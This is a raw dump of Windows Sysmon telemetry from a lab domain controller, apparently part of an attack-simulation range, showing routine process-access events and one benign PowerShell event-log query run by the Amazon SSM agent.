13:34:24.507{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|c:\windows\system32\rpcss.dll+5296|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\RPCRT4.dll+620fa|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002452Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.497{59A5CD1D-8E5B-6005-5B00-00000000A301}39363912C:\Windows\system32\conhost.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002451Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002450Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002449Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002448Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.496{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002447Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002446Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002445Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002444Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002443Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.495{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002442Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.495{59A5CD1D-8E44-6005-0500-00000000A301}6401180C:\Windows\system32\csrss.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000002441Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.494{59A5CD1D-8E5B-6005-5500-00000000A301}37483704C:\Program Files\Amazon\SSM\ssm-agent-worker.exe{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\Amazon\SSM\ssm-agent-worker.exe+5d9ee 154100x80000000000000002440Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.495{59A5CD1D-8E60-6005-7200-00000000A301}2144C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell "Get-WinEvent -FilterHashtable @( @{ LogName='System'; ProviderName='Microsoft-Windows-Kernel-General'; Id=12; Level=4 }, @{ LogName='System'; ProviderName='Microsoft-Windows-WER-SystemErrorReporting'; Id=1001; Level=2 } ) | Sort-Object TimeCreated -Descending" "| Select-Object" "Id, Level, ProviderName, TimeCreated, Properties" "| ConvertTo-Json -Depth 3"C:\Windows\system32\NT AUTHORITY\SYSTEM{59A5CD1D-8E44-6005-E703-000000000000}0x3e70SystemMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{59A5CD1D-8E5B-6005-5500-00000000A301}3748C:\Program Files\Amazon\SSM\ssm-agent-worker.exe"C:\Program Files\Amazon\SSM\ssm-agent-worker.exe" 10341000x80000000000000002439Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 
10341000x80000000000000002438Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002437Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002436Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002435Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+6668|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002434Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002433Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002432Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:24.204{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2800-00000000A301}2696C:\Windows\System32\spoolsv.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002487Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E58-6005-3A00-00000000A301}36643684C:\Windows\system32\conhost.exe{59A5CD1D-8E61-6005-7300-00000000A301}3472C:\Program Files\SplunkUniversalForwarder\bin\splunk-perfmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002486Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002485Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002484Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 
13:34:25.517{59A5CD1D-8E46-6005-0C00-00000000A301}5961032C:\Windows\system32\svchost.exe{59A5CD1D-8E56-6005-2E00-00000000A301}2464C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000002483Microsoft-Windows-Sysmon/Operationalwin-dc-495.attackrange.local-2021-01-18 